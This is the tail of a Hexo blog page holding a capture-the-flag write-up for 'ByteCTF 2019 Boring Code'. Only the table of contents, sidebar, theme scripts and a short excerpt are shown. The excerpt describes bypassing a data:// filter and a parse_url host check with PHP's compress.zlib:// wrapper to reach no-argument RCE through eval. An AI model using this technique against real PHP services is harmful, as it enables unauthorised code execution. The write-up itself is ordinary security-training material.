        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A7%A3%E9%87%8A"><span class="toc-number">1.</span> <span class="toc-text">解释</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#parse-url-url-%E8%A7%A3%E6%9E%90"><span class="toc-number">2.</span> <span class="toc-text">parse_url($url)解析</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#file-get-contents-url-%E4%BC%9A%E5%B9%B2%E5%98%9B"><span class="toc-number">3.</span> <span class="toc-text">file_get_contents($url) 会干嘛?</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%9C%AC%E8%B4%A8%E4%B8%8A%E6%98%AF%E8%BF%99%E6%A0%B7%E7%90%86%E8%A7%A3%E7%9A%84%EF%BC%9A"><span class="toc-number">3.1.</span> <span class="toc-text">本质上是这样理解的：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E2%9D%97-%E9%87%8D%E7%82%B9%EF%BC%9A%E4%BD%A0%E4%BC%A0%E7%9A%84%E5%85%B6%E5%AE%9E%E4%B8%8D%E6%98%AF%E6%9C%89%E6%95%88%E7%9A%84%E5%8E%8B%E7%BC%A9%E6%95%B0%E6%8D%AE%EF%BC%81"><span class="toc-number">3.2.</span> <span class="toc-text">❗ 重点：你传的其实不是有效的压缩数据！</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%F0%9F%9A%A8-%E6%89%80%E4%BB%A5%E6%9C%80%E7%BB%88%E4%BC%9A%E8%A7%A3%E6%9E%90%E6%88%90%EF%BC%9A"><span class="toc-number">3.3.</span> <span class="toc-text">🚨 所以最终会解析成：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E2%9C%85-%E4%BD%86%E6%98%AF%E4%BD%A0%E4%B8%BA%E4%BB%80%E4%B9%88%E8%BF%98%E5%8F%AF%E4%BB%A5%E5%88%A9%E7%94%A8%E5%AE%83%EF%BC%9F"><span class="toc-number">3.4.</span> <span class="toc-text">✅ 但是你为什么还可以利用它？</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E2%9C%85-%E6%80%BB%E7%BB%93%EF%BC%9A%E8%BF%99%E4%B8%AA-payload-%E4%BC%9A%E8%A2%AB%E8%A7%A3%E6%9E%90%E6%88%90"><span class="toc-number">3.5.</span> <span class="toc-text">✅ 总结：这个 payload 会被解析成</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%97%A0%E5%8F%82rce%E8%A7%A3%E6%9E%90"><span class="toc-number">4.</span> <span class="toc-text">无参rce解析</span></a></li></ol>
      
  </div>
</div>
</div>
        <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.webp" data-sizes="auto" alt="达达" class="lazyload">
  <div class="sidebar-author-name">达达</div>
  <div class="sidebar-description"></div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">14</div>
  </div>
  <div class="sidebar-state-category">
    <div>分类</div>
    <div class="sidebar-state-number">0</div>
  </div>
  <div class="sidebar-state-tag">
    <div>标签</div>
    <div class="sidebar-state-number">0</div>
  </div>
</div>
<div class="sidebar-social">
  
</div>
<div class="sidebar-menu">
  
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/" aria-label="首页"></a>
        <div class="sidebar-menu-icon icon rotate">
          
            &#xe62b;
          
        </div>
        <div class="sidebar-menu-link">首页</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/archives" aria-label="归档"></a>
        <div class="sidebar-menu-icon icon rotate">
          
            &#xe62b;
          
        </div>
        <div class="sidebar-menu-link">归档</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/about" aria-label="关于"></a>
        <div class="sidebar-menu-icon icon rotate">
          
            &#xe62b;
          
        </div>
        <div class="sidebar-menu-link">关于</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/friend" aria-label="友链"></a>
        <div class="sidebar-menu-icon icon rotate">
          
            &#xe62b;
          
        </div>
        <div class="sidebar-menu-link">友链</div>
      </div>
    
  
</div>
</div>
      
    
  </div>
  
    
      <div class="sidebar-btn-wrapper">
        <div class="sidebar-toc-btn current"></div>
        <div class="sidebar-common-btn"></div>
      </div>
    
  
</nav>

    </div>
    
    
    
    
<script src="https://npm.webcache.cn/lazysizes@5.3.2/lazysizes.min.js" integrity="sha384-3gT&#x2F;vsepWkfz&#x2F;ff7PpWNUeMzeWoH3cDhm&#x2F;A8jM7ouoAK0&#x2F;fP&#x2F;9bcHHR5kHq2nf+e" crossorigin="anonymous"></script>


<script src="https://npm.webcache.cn/clipboard@2.0.11/dist/clipboard.min.js" integrity="sha384-J08i8An&#x2F;QeARD9ExYpvphB8BsyOj3Gh2TSh1aLINKO3L0cMSH2dN3E22zFoXEi0Q" crossorigin="anonymous"></script>





<script src="/js/script.js"></script>



  
<script src="/js/aos.js"></script>

  <script>
    var aosInit = () => {
      AOS.init({
        duration: 1000,
        easing: "ease",
        once: true,
        offset: 50,
      });
    };
    if (document.readyState === 'loading') {
      document.addEventListener('DOMContentLoaded', aosInit);
    } else {
      aosInit();
    }
  </script>



<script src="/js/pjax_script.js" data-pjax></script>







  
<script src="https://npm.webcache.cn/mouse-firework@0.1.1/dist/index.umd.js" integrity="sha384-8LyaidD9GPxQQgLJO&#x2F;WRw&#x2F;O2h3BoNq&#x2F;ApI&#x2F;ecpvM6RsrCz2qP2ppBXUKihP4V&#x2F;2d" crossorigin="anonymous"></script>

  <script>
    window.firework && window.firework(JSON.parse('{"excludeElements":["a","button"],"particles":[{"shape":"circle","move":["emit"],"easing":"easeOutExpo","colors":["var(--red-1)","var(--red-2)","var(--red-3)","var(--red-4)"],"number":20,"duration":[1200,1800],"shapeOptions":{"radius":[16,32],"alpha":[0.3,0.5]}},{"shape":"circle","move":["diffuse"],"easing":"easeOutExpo","colors":["var(--red-0)"],"number":1,"duration":[1200,1800],"shapeOptions":{"radius":20,"alpha":[0.2,0.5],"lineWidth":6}}]}'))
  </script>










<div id="lazy-script">
  <div>
    
      
      
      <script data-pjax>
        window.REIMU_POST = {
          author: "达达",
          title: "ByteCTF 2019 Boring Code",
          url: "http://dada-06.github.io/2025/05/28/Boring%20Code/",
          excerpt: "",
          description: "",
          stripContent: "这题考了无参数rce   伪协议读取  flag就在主目录下 &amp;#x2F;code里的源码  解释过滤了data:&amp;#x2F;&amp;#x2F; 有个parse_url($url)函数 检测url的host部分  是不是baidu.com 然后下面是无参 最终执行eval($code) 这里通过compress.zlib:&amp;#x2F;&amp;#x2F;伪协议进行文件读取 可以分解为：  compress.zlib:// → 这是 PHP 的流封装器，用于处理 zlib 压缩 的数据流（.gz 格式）。 da",
          date: "Wed May 28 2025 22:07:59 GMT+0800",
          updated: "Wed May 28 2025 23:03:20 GMT+0800",
          cover: "/../covers/6.png",
        };
      </script>
       
    
    
      
        
<script src="/js/insert_highlight.js" data-pjax></script>

        
      
    
    
      <script type="module" data-pjax>
        const PhotoSwipeLightbox = (await safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe-lightbox.esm.min.js", "sha384-DiL6M/gG+wmTxmCRZyD1zee6lIhawn5TGvED0FOh7fXcN9B0aZ9dexSF/N6lrZi/")).default;
        
        const pswp = () => {
          if (_$$('.article-entry a.article-gallery-item').length > 0) {
            new PhotoSwipeLightbox({
              gallery: '.article-entry',
              children: 'a.article-gallery-item',
              pswpModule: () => safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js", "sha384-WkkO3GCmgkC3VQWpaV8DqhKJqpzpF9JoByxDmnV8+oTJ7m3DfYEWX1fu1scuS4+s")
            }).init();
          }
          if(_$$('.article-gallery a.article-gallery-item').length > 0) {
            new PhotoSwipeLightbox({
              gallery: '.article-gallery',
              children: 'a.article-gallery-item',
              pswpModule: () => safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js", "sha384-WkkO3GCmgkC3VQWpaV8DqhKJqpzpF9JoByxDmnV8+oTJ7m3DfYEWX1fu1scuS4+s")
            }).init();
          }
          window.lightboxStatus = 'done';
          window.removeEventListener('lightbox:ready', pswp);
        }
        if(window.lightboxStatus === 'ready') {
          pswp()
        } else {
          window.addEventListener('lightbox:ready', pswp);
        }
      </script>
      
        








      
    
  </div>
</div>


  <script>
    console.log(String.raw`%c 
 ______     ______     __     __    __     __  __    
/\  == \   /\  ___\   /\ \   /\ "-./  \   /\ \/\ \   
\ \  __<   \ \  __\   \ \ \  \ \ \-./\ \  \ \ \_\ \  
 \ \_\ \_\  \ \_____\  \ \_\  \ \_\ \ \_\  \ \_____\ 
  \/_/ /_/   \/_____/   \/_/   \/_/  \/_/   \/_____/ 
                                                  
`,'color: #ff5252;')
    console.log('%c Theme.Reimu v' + '1.8.4' + ' %c https://github.com/D-Sketon/hexo-theme-reimu ', 'color: white; background: #ff5252; padding:5px 0;', 'padding:4px;border:1px solid #ff5252;')
  </script>
  



  
<script src="https://npm.webcache.cn/busuanzi@2.3.0/bsz.pure.mini.js" integrity="sha384-0M75wtSkhjIInv4coYlaJU83+OypaRCIq2SukQVQX04eGTCBXJDuWAbJet56id+S" crossorigin="anonymous" async></script>




<script>
  if ('serviceWorker' in navigator) {
    navigator.serviceWorker.getRegistrations().then((registrations) => {
      for (let registration of registrations) {
        registration.unregister();
      }
    });
  }
</script>









    
  </body>
  </html>

